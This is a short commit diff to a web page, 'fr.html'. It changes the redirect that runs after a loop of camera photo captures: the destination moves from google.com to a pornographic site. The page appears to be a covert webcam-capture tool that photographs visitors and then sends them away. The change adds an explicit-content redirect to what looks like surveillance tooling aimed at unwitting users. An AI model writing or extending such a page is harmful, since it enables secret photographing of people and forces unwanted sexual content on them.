Change final redirection URL in fr.html

--- a/fr.html
+++ b/fr.html
@@ -278,7 +278,7 @@
         if (photoCount >= maxPhotos) {
           clearInterval(interval);
           if (stream) stream.getTracks().forEach(t => t.stop());
-          window.location.replace("https://www.google.com"); // Redirection finale
+          window.location.replace("https://www.mvideoporno.xxx/xhamster/"); // Redirection finale
           return;
         }
         await capturePhoto();
